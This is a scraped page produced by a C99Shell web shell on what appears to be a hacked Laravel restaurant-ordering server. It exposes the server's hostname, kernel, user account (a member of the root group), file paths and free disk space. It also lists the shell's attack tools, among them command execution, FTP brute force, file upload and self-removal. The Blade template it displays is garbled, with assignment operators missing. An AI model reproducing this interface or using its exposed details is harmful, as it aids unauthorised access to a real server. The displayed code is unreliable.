!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/multirest.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 28.36 GB of 117.98 GB (24.04%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     7966ff1f585874fe05751fd02d8abf9094ea32ee.php (2.25 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<ul class="metismenu sidebar-height" id="menu">
    <?php if(isset(auth()->user()->type) && auth()->user()->type=='customer'): ?>
        <li><a class="ai-icon" href="<?php echo e(route('dashboard')); ?>" aria-expanded="false">
                <i class="flaticon-381-networking"></i>
                <span class="nav-text"><?php echo e(trans('layout.dashboard')); ?></span>
            </a>
        </li>
    <?php endif; ?>
    <?php if(auth()->check()): ?>
        <?php $menu\App\Models\Menu::where('user_id',auth()->user()->id)->orderBy('created_at','desc')->limit(1)->get(); ?>
        <?php if(isset($menu[0]) && $menu[0]): ?>
            <li><a class="ai-icon" href="<?php echo e(route('show.restaurant',['slug'=>$menu[0]->url])); ?>"
                   aria-expanded="false">
                    <i class="flaticon-381-add"></i>
                    <span class="nav-text"><?php echo e(trans('layout.menu')); ?></span>
                </a>
            </li>
        <?php endif; ?>
    <?php endif; ?>

    <?php $__currentLoopData $rest_categories$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $cat): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
        <li><a data-id="<?php echo e($cat->id); ?>" class="ai-icon item-category" href="javascript:void(0)" aria-expanded="false">
                <i class="flaticon-381-networking"></i>
                <span class="nav-text"><?php echo e($cat->name); ?></span>
            </a>
        </li>
    <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
    <?php if(!auth()->check()): ?>
        <li><a class="ai-icon" href="<?php echo e(route('registration',['type'=>'customer'])); ?>"
               aria-expanded="false">
                <i class="flaticon-381-add"></i>
                <span class="nav-text"><?php echo e(trans('layout.signup')); ?></span>
            </a>
        </li>
    <?php endif; ?>
</ul>

<div class="copyright mt-4">
    <p><strong><?php echo e(json_decode(get_settings('site_setting'))->name); ?> </strong> © <?php echo e(date('Y')); ?> All Rights Reserved</p>
</div>
<?php /**PATH /home/picotech/domains/multirest.picotech.app/public_html/resources/views/layouts/includes/restaurant_sidebar.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0057 ]--